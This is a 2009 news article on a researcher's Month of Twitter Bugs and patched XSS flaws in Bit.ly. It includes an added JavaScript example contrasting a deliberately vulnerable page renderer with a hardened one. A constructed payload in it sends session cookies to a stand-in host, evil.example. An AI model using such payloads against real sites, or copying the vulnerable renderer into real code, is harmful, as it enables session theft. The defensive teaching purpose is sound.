Month of Twitter Bugs focuses on Bit.ly flaws

By Robert Westervelt | Jul 2, 2009

A security researcher highlighting vulnerabilities in third-party Twitter applications this month focused on several serious cross-site scripting (XSS) flaws in the popular Bit.ly link-shortening service.

Aviv Raff launched the Month of Twitter Bugs today, showcasing the Bit.ly errors. Raff gave Bit.ly's developers notice, and the last of the flaws was patched less than three hours after the disclosure.

Bit.ly is one of the more popular URL-shortening services. Users who set up an account with the service can track their shortened links. The service is integrated with Firefox as well as several third-party Twitter organizer applications. In addition to Bit.ly, nearly a dozen other link-shortening services are available.

Raff highlighted XSS errors in the url and keywords parameters, and similar vulnerabilities in the username field of the Bit.ly login page and the content-type field of the URL info page. The flaws were discovered by security researchers Mike Bailey and Mario Heiderich. It took Bit.ly developers about a month to correct the errors, with the latest one patched today.

"With such a poor response rate to security vulnerabilities and with such a poorly coded website, in terms of security, we can only hope for the best," Raff wrote in his blog. "Please be careful clicking those shortened URLs." XSS flaws let an attacker embed script in a link that appears to come from a trusted site. When the victim follows the link, the script travels to the site as part of the request, is echoed back unencoded in the response, and runs in the victim's browser with the site's privileges, typically to steal session cookies or act on the user's behalf. A link shortener makes such a link harder to inspect, because the malicious parameters are hidden behind the short URL. When a Web form has an XSS flaw, an attacker can likewise inject markup or script that changes what the form does.
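The reflected-XSS pattern described above, as an added example that is not Bit.ly's code and not from Raff's post: a minimal "URL info" page renderer that echoes the url and keywords query parameters, shown in a vulnerable form beside a hardened one. The parameter names, page layout and attack strings are constructed for illustration. The hardened version also shows a check that escaping alone does not give you: a user-supplied URL placed in an href must be restricted to http(s), since a `javascript:` URL executes even when it is correctly HTML-escaped.

```javascript
// Added example, not code from Bit.ly or from the original article.
// Parameter names (url, keywords) and markup are assumptions for illustration.

// Escape the five characters that matter in HTML text and attribute context.
const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);

// Only http(s) URLs may be placed in an href. Other schemes ("javascript:",
// "data:") would run in the browser even after HTML escaping.
function safeHref(url) {
  try {
    const u = new URL(String(url));
    return (u.protocol === "http:" || u.protocol === "https:") ? u.href : "#";
  } catch {
    return "#"; // not a parseable absolute URL at all
  }
}

// Vulnerable: the query values are concatenated straight into the page,
// the classic reflected XSS via a URL parameter.
function renderInfoVulnerable(query) {
  return `<p>Long URL: <a href="${query.url}">${query.url}</a></p>` +
         `<p>Keywords: ${query.keywords}</p>`;
}

// Hardened: every reflected value is escaped for its context and the
// href is validated before it is emitted.
function renderInfoHardened(query) {
  const url = query.url ?? "";
  const keywords = query.keywords ?? "";
  return `<p>Long URL: <a href="${escapeHtml(safeHref(url))}">${escapeHtml(url)}</a></p>` +
         `<p>Keywords: ${escapeHtml(keywords)}</p>`;
}

// Constructed query string an attacker might hide behind a shortened link:
// breaks out of the href attribute and exfiltrates the session cookie.
const attack = {
  url: '"><script>document.location="http://evil.example/?c="+document.cookie</script>',
  keywords: "<img src=x onerror=alert(1)>",
};

// Crude indicator used only to compare the two renderers: did a script/img
// tag or a javascript: href from the input survive into the output markup?
function containsActiveMarkup(html) {
  return /<(script|img)|href="javascript:/i.test(html);
}

console.log("vulnerable:", containsActiveMarkup(renderInfoVulnerable(attack))); // true
console.log("hardened:  ", containsActiveMarkup(renderInfoHardened(attack)));   // false
```

The `containsActiveMarkup` check is a demonstration aid, not a detection mechanism; in practice the fix is the output encoding and scheme allow-list in `renderInfoHardened`, applied on every reflection point (the login page's username field and the info page's content-type field in the article are the same class of bug).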

Link shortening services have come under increased scrutiny in recent months. A security breach in URL shortener Cligs (Cli.gs) last month redirected 2.2 million URLs to a single Web page. The Web page was not malicious, but it highlighted the threat posed by flaws in the link shortening services.

Raff announced in June that he planned to document Twitter-related flaws. The security researcher documented browser flaws in a similar format in 2006. The latest project is being showcased on Raff's Twitpwn website.

The bug tracking project is getting a lot of attention from security professionals who are dealing with an increased use of Twitter, Facebook and other Web-based social networking services.

Raff has been critical of Twitter and third-party services that rely on Twitter's API to connect to the Twitter platform. He said in a recent blog post that the API could be used as a springboard by attackers to create Twitter worms and spread malware to steal sensitive data from users.

The Month of Twitter Bugs is accepting submissions of vulnerabilities discovered in third-party Twitter services.
